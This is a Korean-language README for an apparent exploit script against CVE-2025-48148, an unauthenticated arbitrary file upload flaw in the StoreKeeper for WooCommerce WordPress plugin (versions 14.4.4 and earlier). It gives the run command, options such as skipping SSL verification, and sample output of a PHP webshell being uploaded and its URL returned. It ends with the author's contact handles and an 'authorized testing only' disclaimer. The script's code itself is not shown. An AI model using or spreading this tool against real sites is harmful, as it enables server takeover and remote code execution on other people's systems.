
StoreKeeper for WooCommerce <= 14.4.4 - 인증되지 않은 임의 파일 업로드
StoreKeeper for WooCommerce <= 14.4.4 - 인증되지 않은 임의 파일 업로드
WordPress용 StoreKeeper for WooCommerce 플러그인은 14.4.4 이하의 모든 버전에서 파일 유형 검증이 누락되어 임의 파일 업로드에 취약합니다.
이로 인해 인증되지 않은 공격자가 영향을 받는 사이트의 서버에 임의의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행으로 이어질 수 있습니다.
스크립트 이름: CVE-2025-48148.py
이 스크립트는 CVE-2025-48148에 대한 전문적인 개념 증명(PoC) 익스플로잇으로, StoreKeeper for WooCommerce 플러그인을 사용하여 취약한 WordPress 사이트에 웹셸을 업로드하는 과정을 자동화하도록 설계되었습니다.
nonce 토큰을 대상 URL에서 직접 가져옵니다.python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
선택적 플래그:
--debug 상세 출력을 활성화합니다.--insecure SSL 인증서 검증을 건너뜁니다.예시:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 이메일: [email protected]
📨 텔레그램: @Kxploit
이 스크립트는 교육 및 공인된 침투 테스트 목적으로만 제공됩니다.
저자는 이 도구로 인한 오용 또는 피해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 허가를 받으십시오.
By: Nxploited ( Khaled Alenazi )